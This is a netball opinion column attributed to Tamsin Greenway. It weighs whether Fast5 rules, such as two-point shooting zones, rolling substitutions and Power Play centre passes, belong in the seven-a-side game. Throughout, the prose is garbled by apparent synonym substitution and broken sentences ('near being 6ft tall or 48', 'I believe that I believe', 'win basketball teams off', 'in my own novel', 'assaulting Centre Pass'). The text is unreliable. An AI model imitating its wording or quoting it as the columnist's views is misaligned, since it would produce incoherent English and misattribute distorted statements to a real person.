Tamsin Greenway ponders the merit in implementing any of the Fast5 rules into netball
In the second portion of this weeks column, Tamsin Greenway ponders on the merits (or not) of executing a number of those Fast5 rules to the full format of netball…
There was a questionnaire in Australia about what principles people would like to see changed from the seven-a-side match.
As the game continues to push forwards, rule changes to make itTV or bring in a broader audience will be considered
Bearing this in mind, and following the epic Fast5 All-Stars Championships in the Copper Box last weekend, I wished to take a look at a few of the rules that have been thrown around and that could be considered or implemented in the seven-a-side game.
I think the shooting one is quite interesting… and probably gets the maximum amount of uproar when indicating a change.
I definitely wouldnt need to observe long-bombs in terms of shooting outside the circle in a game. But, I am intrigued about how the ring could split into one-point along with two-point places.
I am not saying that it needs to change in the league but weve produced a game in which we have tall shooters and unless you are near being 6ft tall or 48, its becoming harder to play at the ring.
There are still a few [briefer ] GAs exactly that which selectors are currently considering, and what kids understand although floating about, is that you have to have tall shooters to post shooting percentages to make it. We went through years of changing every GA that was brief into a WA!
I believe that I believe we are making that a issue with kids rather than embracing the simple fact that if you can shoot long and because of this we also have made a panic of shooting from long distance , then you should.
When I set it out a number of those Australian fans were stating that they would trialled it and that people were passing it in and out and making a mockery of their game.
But, I believe that only backs up my point. Most players dont shoot from distance and Australia, along with others, are a key leader in this change from the sport. New Zealand won a World Cup on shooting from 17, whereas we cant overlook that.
So, this question is would it help be able to perform 60 minutes and to get additional time? Would it change strategies and team selection?
Splitting the circle into two and one points will certainly change the dynamic of this defence because if shooters are moving from distance, how you win ball unexpectedly becomes very different. It would alter the functions of the shooting circle.
Especially with a few of the blowout games in Superleague, with one and two stage shots, could it likewise help? Look at a team like Storm who finished – if these points were made into two will Sophie Hankin shooting being able to rally have changed results and matches?
This is why I dont think that we need to completely take it. I am aware there are a good deal of traditionalists out there and that I get as it is too I really like our game, but I think that the game has changed in the last few years. I really dont see that there is any reason why it researched some more to see if its a place to help enhance rather than hinder or couldnt be looked at.
Interestingly Im not a big fan of rolling subs. A great deal of people may say it brings impact and that it is the one to alter and that they dont mind it.
Primarily Im not entirely against it, since I do think we need to eliminate the dodgy timeouts – since honestly the imitation injuries are very simple to see, however I can not get my mind around infinite rolling subs. If there was a limitation to these or there has been a move towards the strategic timeout that Suncorp has introduced then I would be more keen.
My issues come from players point of view and both a coachs. As a participant, in certain positions it is not always that easy to go make an effect in five or six minutes at per year. So, unless youre having an absolute shocker, as a player you should have the ability to work out things and also be given the time to achieve that.
I believe it could easily become a justification for a lack of training. Its a really simple cop-out when a participant isnt quite doing what you only want to roll on a different sub, try something fresh. There will be occasions this must occur but then this wouldnt be a constant if youve completed your homework.
I liked to give my players the opportunity at things and also to trust that participant send and to go back on. I think we must check at how this filters from elite degree and if the sole answer ever is to keep trying new players out we might eliminate the essence of what playing and coaching is all about.
I do not feel it has a place at the game, although I like the Power Play its amazing. It is that easy in my own novel.
With Centre Passes I do not feel you ought to be provided an additional lifeline. Shooting from space requires skill and execution, being given the ball or double points to help get excitement or games just takes it a lot.
Your Centre Pass should be as strong as the assaulting Centre Pass. You need to have tactical elements that mean you could win basketball teams off regardless and arrangements, so I truly dont believe that you need to be provided a lifeline because you are losing. That is a part of game – you win or you lose.
A vital portion of netball is that you receive the ball 50 percent of their time and its what you opt to do with it. I think there are better ways to get games and I do not think that this is one of these.
